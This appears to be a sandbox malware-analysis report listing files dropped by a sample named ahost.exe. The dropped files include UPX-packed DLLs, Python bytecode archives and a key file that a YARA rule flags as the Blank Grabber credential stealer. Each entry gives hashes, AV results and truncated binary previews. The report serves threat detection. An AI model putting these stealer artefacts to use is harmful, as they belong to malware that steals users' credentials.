                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):120080
                                                                                                                                                                                                                            Entropy (8bit):7.901857200989369
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
                                                                                                                                                                                                                            MD5:21D27C95493C701DFF0206FF5F03941D
                                                                                                                                                                                                                            SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
                                                                                                                                                                                                                            SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
                                                                                                                                                                                                                            SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36112
                                                                                                                                                                                                                            Entropy (8bit):7.6548425105220375
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
                                                                                                                                                                                                                            MD5:D6F123C4453230743ADCC06211236BC0
                                                                                                                                                                                                                            SHA1:9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
                                                                                                                                                                                                                            SHA-256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
                                                                                                                                                                                                                            SHA-512:F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):88336
                                                                                                                                                                                                                            Entropy (8bit):7.9108932581373015
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
                                                                                                                                                                                                                            MD5:055EB9D91C42BB228A72BF5B7B77C0C8
                                                                                                                                                                                                                            SHA1:5659B4A819455CF024755A493DB0952E1979A9CF
                                                                                                                                                                                                                            SHA-256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
                                                                                                                                                                                                                            SHA-512:C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27408
                                                                                                                                                                                                                            Entropy (8bit):7.449801379195215
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
                                                                                                                                                                                                                            MD5:513DCE65C09B3ABC516687F99A6971D8
                                                                                                                                                                                                                            SHA1:8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
                                                                                                                                                                                                                            SHA-256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
                                                                                                                                                                                                                            SHA-512:621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):45328
                                                                                                                                                                                                                            Entropy (8bit):7.729647917060796
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
                                                                                                                                                                                                                            MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
                                                                                                                                                                                                                            SHA1:622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
                                                                                                                                                                                                                            SHA-256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
                                                                                                                                                                                                                            SHA-512:0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60176
                                                                                                                                                                                                                            Entropy (8bit):7.847943448203495
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
                                                                                                                                                                                                                            MD5:8CD40257514A16060D5D882788855B55
                                                                                                                                                                                                                            SHA1:1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
                                                                                                                                                                                                                            SHA-256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
                                                                                                                                                                                                                            SHA-512:A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):68368
                                                                                                                                                                                                                            Entropy (8bit):7.86108869046165
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
                                                                                                                                                                                                                            MD5:7EF27CD65635DFBA6076771B46C1B99F
                                                                                                                                                                                                                            SHA1:14CB35CE2898ED4E871703E3B882A057242C5D05
                                                                                                                                                                                                                            SHA-256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
                                                                                                                                                                                                                            SHA-512:AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1394456
                                                                                                                                                                                                                            Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                            MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                            SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                            SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                            SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):116127
                                                                                                                                                                                                                            Entropy (8bit):7.711367988029357
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:G92Whj+rZWepsjyuPX88rymLScRMK0RnzJ1d1oYBskwIJgVtFC/SRhDlhLxUAOcH:E6l1pDukwDSRK4V1lslptVW7MF
                                                                                                                                                                                                                            MD5:EE050C3075372382C9939813C8B84A65
                                                                                                                                                                                                                            SHA1:F9DC45D4012978F1811F819774B3859987D266E0
                                                                                                                                                                                                                            SHA-256:119361FAF77A04D9A9682C9AD2C14049A4DE06F4C376D1486C8E9D12DF9A3F70
                                                                                                                                                                                                                            SHA-512:A4D6F41183384B500DE9019D065907B47D23AD7BD147E147E3F911006B35AD44D9D78981EA572586335725566D9EB36D3117D408895DA6D67EB66F262A0C61B8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK.........[.Y..7s)...).......stub-o.pyc..........Tg.&.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1630488
                                                                                                                                                                                                                            Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                            MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                            SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                            SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                            SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):29968
                                                                                                                                                                                                                            Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                            MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                            SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                            SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                            SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):227096
                                                                                                                                                                                                                            Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                            MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                            SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                            SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                            SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1850640
                                                                                                                                                                                                                            Entropy (8bit):7.994061638516346
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
                                                                                                                                                                                                                            MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
                                                                                                                                                                                                                            SHA1:0003946454B107874AA31839D41EDCDA1C77B0AF
                                                                                                                                                                                                                            SHA-256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
                                                                                                                                                                                                                            SHA-512:1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):630736
                                                                                                                                                                                                                            Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):456
                                                                                                                                                                                                                            Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26384
                                                                                                                                                                                                                            Entropy (8bit):7.471075877103443
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
                                                                                                                                                                                                                            MD5:FB70AECE725218D4CBA9BA9BBB779CCC
                                                                                                                                                                                                                            SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
                                                                                                                                                                                                                            SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
                                                                                                                                                                                                                            SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):659216
                                                                                                                                                                                                                            Entropy (8bit):7.993010988331354
